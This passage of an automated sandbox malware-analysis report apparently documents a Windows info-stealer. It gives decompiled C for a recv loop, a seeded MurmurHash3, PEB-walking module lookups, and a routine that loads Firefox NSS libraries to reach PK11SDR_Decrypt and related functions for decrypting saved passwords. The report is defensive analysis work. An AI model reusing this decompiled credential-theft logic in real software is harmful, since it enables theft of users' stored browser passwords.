                                      				char _v4100;       // 4 KiB receive buffer on the stack
                                      				char* _t11;        // reused by the decompiler for the recv return value (eax)
                                      				intOrPtr* _t21;    // _a4: socket at offset 0, E0025B62E argument at offset 4
                                      				void* _t22;
                                      
                                      				E00251130(0x1000, __ecx);          // called with the frame size at entry; likely a stack probe
                                      				E00251052( &_v4100, 0, 0x1000);    // memset-style zeroing of the buffer
                                      				_t21 = _a4;
                                      				while(1) {
                                      					_t22 = _t22 + 0xc;
                                      					_t11 =  &_v4100;
                                      					__imp__#16( *_t21, _t11, 0x1000, 0);   // recv(socket, buffer, 0x1000, 0)
                                      					if(_t11 == 0xffffffff) {               // SOCKET_ERROR
                                      						break;
                                      					}
                                      					if(E0025B62E( *((intOrPtr*)(_t21 + 4)),  &_v4100, _t11) != 0) {
                                      						E00251052( &_v4100, 0, 0x1000);    // clear the buffer before the next recv
                                      						continue;
                                      					}
                                      					break;                                 // handler returned 0: stop receiving
                                      				}
                                      				return 0;
                                      			}

                                      APIs
                                      • recv.WS2_32(?,?,00001000,00000000), ref: 0025B47E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: recv
                                      • String ID:
                                      • API String ID: 1507349165-0
                                      • Opcode ID: e0b9d3bfc80ab93591b04d5fcdaa11f614e3d566827b5535b85e1bc8828839e9
                                      • Instruction ID: 273b11bbe98de18253b3ae15c38ddf4e6dff2fc8413d663ffa1462f0079dbbb4
                                      • Opcode Fuzzy Hash: e0b9d3bfc80ab93591b04d5fcdaa11f614e3d566827b5535b85e1bc8828839e9
                                      • Instruction Fuzzy Hash: 86F0FC7152025866DB219A64DC41FE6735CAB043D6F100455FD44D70C5D7B0EDA88B58
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0
                                      • API String ID: 0-4108050209
                                      • Opcode ID: cbe18fcf949fa8ca6a643e9b22d618a315fa225c49b3498eb32cb0358680b79c
                                      • Instruction ID: e568e2a41005601e0cfccb033c835b967bbb31aea00852fa908c3e41a669c10c
                                      • Opcode Fuzzy Hash: cbe18fcf949fa8ca6a643e9b22d618a315fa225c49b3498eb32cb0358680b79c
                                      • Instruction Fuzzy Hash: E6519932234A875BEB39D92C889DBBF6BE5BF65602FCC0519D782C7282C754D9068352
                                      Uniqueness

                                      Uniqueness Score: 0.04%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID:
                                      • API String ID: 54951025-0
                                      • Opcode ID: 4f1bcc48a41739c4158508c3e832bb8a8c1e9c87b36af736844c836d6838a279
                                      • Instruction ID: 4804b343da0d960ea54a35839a96d1f65ffdeb9509002e30bc9bc6b0f47a5e8b
                                      • Opcode Fuzzy Hash: 4f1bcc48a41739c4158508c3e832bb8a8c1e9c87b36af736844c836d6838a279
                                      • Instruction Fuzzy Hash: D5A01130200200CFE3A28E32A28820E3AEEBA00380B00822AE000C8228EA2080808B22
                                      Uniqueness

                                      Uniqueness Score: 0.04%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f9a2e4514381f2c98331f7f9a6300ad5f7ffe56f27ec30d5408c386e67ef3ec6
                                      • Instruction ID: 8ef5ec8d0716a6cfc629b3f33b189117fa5ece88144d379c23ddf1f5d5ab9625
                                      • Opcode Fuzzy Hash: f9a2e4514381f2c98331f7f9a6300ad5f7ffe56f27ec30d5408c386e67ef3ec6
                                      • Instruction Fuzzy Hash: 3021B673F2043947770CC47E8C5627DB6E1C78C501745827AF9A6DA3C1E968D927E2E4
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
                                      • Instruction ID: a8195f962065177dcd8a3f0d387c672676246e6c9f0c4cfba0abd81a4f3c9dee
                                      • Opcode Fuzzy Hash: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
                                      • Instruction Fuzzy Hash: 2A316F76E10A269FCB18CF58C4D09AEB7F6FF89314B6981A9D845E7312D730E951CB80
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b95a732b3fb3eaa10f5a76d9721b95eed5fa6fad285a3fa41a0a47ba74ae8893
                                      • Instruction ID: 9a702cfd028054cb579218280f40e95ebf2cb404ac603a531a71d970fed33143
                                      • Opcode Fuzzy Hash: b95a732b3fb3eaa10f5a76d9721b95eed5fa6fad285a3fa41a0a47ba74ae8893
                                      • Instruction Fuzzy Hash: 5C11E763F308391B374CC52E8C9737962D1EB9C600347523EE966D62C0E464DA23D3D4
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                      • Instruction ID: ef87f59ae770f011246b8ab737e15c1a3422a86086a285ad5c0db3ce44d756f9
                                      • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                      • Instruction Fuzzy Hash: 1931D57661434A8FC710DF18D8D0A2AB7E4FF88304F4509ADE69587312D330F9168FA1
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 83%
                                      			// 32-bit MurmurHash3 (x86_32 variant) over the buffer at __ecx with length __edx and
                                      			// seed 0x10ad; the digest is stored through _a8. The multipliers 0xcc9e2d51 and
                                            			// 0x1b873593 with rol 15 / rol 13 are the MurmurHash3 body step (-0x19ab949c is
                                      			// 0xe6546b64 as unsigned), and 0x85ebca6b / 0xc2b2ae35 are its fmix32 finaliser.
                                      			E0025F9F3(void* __ecx, signed int __edx, signed int* _a8) {
                                      				void* _t12;
                                      				signed int* _t24;
                                      				void* _t25;
                                      				signed int _t32;        // length
                                      				signed int _t34;        // k1 for the tail bytes
                                      				signed int _t41;
                                      				signed int _t42;        // h1
                                      				signed int _t47;
                                      				signed int _t48;
                                      				signed char* _t51;      // pointer to the tail (just past the last full 4-byte block)
                                      
                                      				_t32 = __edx;                 // keep the length for the final h1 ^= len
                                      				asm("cdq");                   // cdq + and 3 + shift: signed len / 4 idiom
                                      				_t41 = __edx & 0x00000003;
                                      				_t42 = 0x10ad;                // h1 = seed
                                      				_t47 = _t41 + __edx >> 2;     // number of full 4-byte blocks (decompiler rendering)
                                      				_t51 = __ecx + _t47 * 4;
                                      				_t48 =  ~_t47;                // negative block index, counted up towards 0
                                      				if(_t41 != 0) {
                                      					do {                                   // body: one 4-byte block per iteration
                                      						asm("rol eax, 0xf");
                                      						asm("rol eax, 0xd");
                                      						_t42 = ( *(_t51 + _t48 * 4) * 0xcc9e2d51 * 0x1b873593 ^ _t42) * 5 - 0x19ab949c;
                                      						_t48 = _t48 + 1;
                                      					} while (_t48 != 0);
                                      				}
                                      				_t34 = 0;
                                      				_t12 = (_t32 & 0x00000003) - 1;       // tail: 1, 2 or 3 remaining bytes
                                      				if(_t12 == 0) {
                                      					L7:
                                      					asm("rol eax, 0xf");
                                      					_t42 = _t42 ^ ( *_t51 & 0x000000ff ^ _t34) * 0xcc9e2d51 * 0x1b873593;
                                      				} else {
                                      					_t25 = _t12 - 1;
                                      					if(_t25 == 0) {
                                      						L6:
                                      						_t34 = _t34 ^ (_t51[1] & 0x000000ff) << 0x00000008;
                                      						goto L7;
                                      					} else {
                                      						if(_t25 == 1) {
                                      							_t34 = (_t51[2] & 0x000000ff) << 0x10;
                                      							goto L6;
                                      						}
                                      					}
                                      				}
                                      				_t24 = _a8;
                                      				// h1 ^= len; fmix32: h ^= h >> 16; h *= 0x85ebca6b; h ^= h >> 13; h *= 0xc2b2ae35; h ^= h >> 16
                                      				 *_t24 = (((_t42 ^ _t32) >> 0x00000010 ^ _t42 ^ _t32) * 0x85ebca6b >> 0x0000000d ^ ((_t42 ^ _t32) >> 0x00000010 ^ _t42 ^ _t32) * 0x85ebca6b) * 0xc2b2ae35 >> 0x00000010 ^ (((_t42 ^ _t32) >> 0x00000010 ^ _t42 ^ _t32) * 0x85ebca6b >> 0x0000000d ^ ((_t42 ^ _t32) >> 0x00000010 ^ _t42 ^ _t32) * 0x85ebca6b) * 0xc2b2ae35;
                                      				return _t24;
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 940939e4bd13f0287124b6da9b8e99d7d471d9685142fc905d3a88637cfab6e7
                                      • Instruction ID: a4bccc093fe412ccc998576dfa7d5587005a179abc3908f4695368983f6791ce
                                      • Opcode Fuzzy Hash: 940939e4bd13f0287124b6da9b8e99d7d471d9685142fc905d3a88637cfab6e7
                                      • Instruction Fuzzy Hash: 1C116B327646120E972C9C3E4E17067FBCBD3C9111788983FE89FCB695E531E70A4681
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 940939e4bd13f0287124b6da9b8e99d7d471d9685142fc905d3a88637cfab6e7
                                      • Instruction ID: 8ce96dce6e90a88764d313d431f505562f7dd03834a36a2627573c317ab8f54b
                                      • Opcode Fuzzy Hash: 940939e4bd13f0287124b6da9b8e99d7d471d9685142fc905d3a88637cfab6e7
                                      • Instruction Fuzzy Hash: 2511AB737246120A876C9C3E5E17067FBDBD3CD110B88887FE89BCB294E031E7064680
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 52d6af32f81210a7d8c2339af9eb0079fa52d88a47775c7bbb03b4768aeb6e14
                                      • Instruction ID: e8d38c029954ac47de8f01644b4dc3be8838794209e633ec48294c2391d3f010
                                      • Opcode Fuzzy Hash: 52d6af32f81210a7d8c2339af9eb0079fa52d88a47775c7bbb03b4768aeb6e14
                                      • Instruction Fuzzy Hash: 1001BC7994C6C2EFC7268F349864043BFA46E8F32439E2AD9C5D08F0A3CA119482DB00
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: de713413ae30e9bbd629b1ce9e9688af373d2f3a06129fa7c1a59eb67a33a478
                                      • Instruction ID: 93be0a32f1b9782e21af9b42a8026f320aac01d2704db4a7e69055d008637b17
                                      • Opcode Fuzzy Hash: de713413ae30e9bbd629b1ce9e9688af373d2f3a06129fa7c1a59eb67a33a478
                                      • Instruction Fuzzy Hash: 0A018F6955C6C2EFCB668F389864053BFF06E8F32439F2AD9C5D18F1A3C6119486DB01
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 69b3ff5fd1344fc2f5de9ce969d2b5a23f5395e665722d9f0df2243ff16b4716
                                      • Instruction ID: 72901a49b0ea8c53153fec629e05dff80d155ab6bb7795e17528a847df607d4e
                                      • Opcode Fuzzy Hash: 69b3ff5fd1344fc2f5de9ce969d2b5a23f5395e665722d9f0df2243ff16b4716
                                      • Instruction Fuzzy Hash: 90E08C72925228EBCB24DBCCD9489AAF7ECEB09B10F55019BFA08D3201C270DE40C7D0
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 100%
                                      			E0025E5BE() {
                                      				intOrPtr* _t10;
                                      				intOrPtr* _t11;
                                      
                                      				_t10 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14;
                                      				_t11 =  *_t10;
                                      				while(_t11 != _t10) {
                                      					if(E0025E67C( *((intOrPtr*)(_t11 + 0x28))) == 0) {
                                      						return  *((intOrPtr*)(_t11 + 0x10));
                                      					}
                                      					_t11 =  *_t11;
                                      				}
                                      				return 0;
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                      • Instruction ID: d46be2897f3072e7431122363642ca0a9bf9e38cace6f7c16b9369315cc50d46
                                      • Opcode Fuzzy Hash: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                      • Instruction Fuzzy Hash: 56E086332205508BCE25DF19D540915B3B5EB9037575B0465E84697501F730FE19CA54
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                      • Instruction ID: 4169d3003cf2f98cfef0302d458381abee62581eda35f5034eab11b6608232c2
                                      • Opcode Fuzzy Hash: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                      • Instruction Fuzzy Hash: BFE08C722305118BC621DF19F880A12F3F4EF80370B2A0468E44793900C320FC21CA90
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 100%
                                      			E0025E8EC() {
                                      				intOrPtr _t4;
                                      
                                      				_t4 =  *[fs:0x30];
                                      				if(_t4 == 0) {
                                      					return 0;
                                      				} else {
                                      					return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t4 + 0xc)) + 0xc)))))) + 0x18));
                                      				}
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                      • Instruction ID: e8c25eae13c9cde39ce6f2aaf1fa1cd4559556fc8d5f3d84713bd541d1dd9593
                                      • Opcode Fuzzy Hash: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                      • Instruction Fuzzy Hash: 3CD0EA783619418FCF55CF18C584E11B3E4EB49761B0A8491E905CB731D734ED00EA00
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                      • Instruction ID: 58b51ffb7b70b51da9df25a439d1039b2b520f06a3f14f6f3345fcc6506c51e3
                                      • Opcode Fuzzy Hash: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                      • Instruction Fuzzy Hash: F2D0EA787619418FCB51CF18C584E01B3E4EB49760B0A8491E905CB771D734ED00EA40
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 100%
                                      			E0025E5B7() {
                                      
                                      				return  *[fs:0x30];
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 98%
                                      			E0025A324(void* __ecx, void* __edx, WCHAR* _a4) {
                                      				WCHAR* _v8;
                                      				long _v12;
                                      				WCHAR* _v16;
                                      				WCHAR* _v20;
                                      				char _v24;
                                      				char _v28;
                                      				WCHAR* _v32;
                                      				WCHAR* _v36;
                                      				WCHAR* _v40;
                                      				short _v560;
                                      				struct HINSTANCE__* _t135;
                                      				WCHAR* _t158;
                                      				intOrPtr _t194;
                                      				void* _t206;
                                      				void* _t216;
                                      				void* _t218;
                                      
                                      				_t206 = __edx;
                                      				_t158 = 0;
                                      				_t216 = __ecx;
                                      				E00251052( &_v560, 0, 0x104);
                                      				GetCurrentDirectoryW(0x104,  &_v560);
                                      				SetCurrentDirectoryW(_a4);
                                      				E00253297( &_a4, _t206, 0, "\\");
                                      				E0025345A( &_v40,  &_a4);
                                      				E00253297( &_v40, _t206, 0, L"nss3.dll");
                                      				E0025345A( &_v20,  &_a4);
                                      				E00253297( &_v20, _t206, 0, L"msvcr120.dll");
                                      				E0025345A( &_v16,  &_a4);
                                      				E00253297( &_v16, _t206, 0, L"msvcp120.dll");
                                      				E0025345A( &_v36,  &_a4);
                                      				E00253297( &_v36, _t206, 0, L"mozglue.dll");
                                      				E0025345A( &_v32,  &_a4);
                                      				E00253297( &_v32, _t206, 0, L"softokn3.dll");
                                      				E0025345A( &_v28,  &_a4);
                                      				E00253297( &_v28, _t206, 0, L"msvcp");
                                      				E0025345A( &_v24,  &_a4);
                                      				E00253297( &_v24, _t206, 0, L"msvcr");
                                      				_t218 = 0x5a;
                                      				_v12 = 0x104;
                                      				while(1) {
                                      					E0025345A( &_v8,  &_v28);
                                      					E00253297(E0025309F( &_v8, _t206, 0, _v12), _t206, 0, L".dll");
                                      					if(PathFileExistsW(_v8) != 0) {
                                      						break;
                                      					}
                                      					_v12 = _v12 + 0xa;
                                      					E00255A2D(_v8);
                                      					_t224 = _v12 - 0x96;
                                      					_v8 = _t158;
                                      					if(_v12 != 0x96) {
                                      						continue;
                                      					} else {
                                      						while(1) {
                                      							L5:
                                      							E0025345A( &_v8,  &_v24);
                                      							E00253297(E0025309F( &_v8, _t206, _t224, _t218), _t206, _t224, L".dll");
                                      							if(PathFileExistsW(_v8) != 0) {
                                      								break;
                                      							}
                                      							_t218 = _t218 + 0xa;
                                      							E00255A2D(_v8);
                                      							_v8 = _t158;
                                      							if(_t218 != 0x96) {
                                      								continue;
                                      							}
                                      							L9:
                                      							 *((intOrPtr*)(_t216 + 0xa8)) = LoadLibraryW(_v20);
                                      							 *((intOrPtr*)(_t216 + 0xac)) = LoadLibraryW(_v16);
                                      							 *((intOrPtr*)(_t216 + 0xb0)) = LoadLibraryW(_v36);
                                      							 *((intOrPtr*)(_t216 + 0xb4)) = LoadLibraryW(_v40);
                                      							_t135 = LoadLibraryW(_v32);
                                      							 *(_t216 + 0xb8) = _t135;
                                      							if( *((intOrPtr*)(_t216 + 0xac)) != _t158 &&  *((intOrPtr*)(_t216 + 0xb0)) != _t158) {
                                      								_t194 =  *((intOrPtr*)(_t216 + 0xb4));
                                      								if(_t194 != 0) {
                                      									_t230 = _t135;
                                      									if(_t135 != 0) {
                                      										_push(_t194);
                                      										 *((intOrPtr*)(_t216 + 0x68)) = E0025E907(_t194, "NSS_Init", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x80)) = E0025E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11_GetInternalKeySlot", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x7c)) = E0025E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11_Authenticate", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x70)) = E0025E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11SDR_Decrypt", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x74)) = E0025E907( *((intOrPtr*)(_t216 + 0xb4)), "NSSBase64_DecodeBuffer", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x78)) = E0025E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11_CheckUserPassword", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x6c)) = E0025E907( *((intOrPtr*)(_t216 + 0xb4)), "NSS_Shutdown", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x84)) = E0025E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11_FreeSlot", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x88)) = E0025E907( *((intOrPtr*)(_t216 + 0xb4)), "PR_GetError", _t230);
                                      										SetCurrentDirectoryW( &_v560);
                                      										_t158 = 1;
                                      									}
                                      								}
                                      							}
                                      							E00255A2D(_v24);
                                      							E00255A2D(_v28);
                                      							E00255A2D(_v32);
                                      							E00255A2D(_v36);
                                      							E00255A2D(_v16);
                                      							E00255A2D(_v20);
                                      							E00255A2D(_v40);
                                      							E00255A2D(_a4);
                                      							return _t158;
                                      						}
                                      						E00253264( &_v20,  &_v8);
                                      						E00255A2D(_v8);
                                      						goto L9;
                                      					}
                                      				}
                                      				E00253264( &_v16,  &_v8);
                                      				E00255A2D(_v8);
                                      				goto L5;
                                      			}

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0025A352
                                      • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0025A35B
                                        • Part of subcall function 0025345A: lstrcpyW.KERNEL32(00000000,?), ref: 00253484
                                        • Part of subcall function 0025309F: wsprintfW.USER32 ref: 002530BA
                                      • PathFileExistsW.SHLWAPI(00259406), ref: 0025A449
                                      • PathFileExistsW.SHLWAPI(00259406), ref: 0025A4A5
                                      • LoadLibraryW.KERNEL32(?), ref: 0025A4E4
                                      • LoadLibraryW.KERNEL32(?), ref: 0025A4EF
                                      • LoadLibraryW.KERNEL32(?), ref: 0025A4FA
                                      • LoadLibraryW.KERNEL32(?), ref: 0025A505
                                      • LoadLibraryW.KERNEL32(?), ref: 0025A510
                                      • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0025A5FD
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
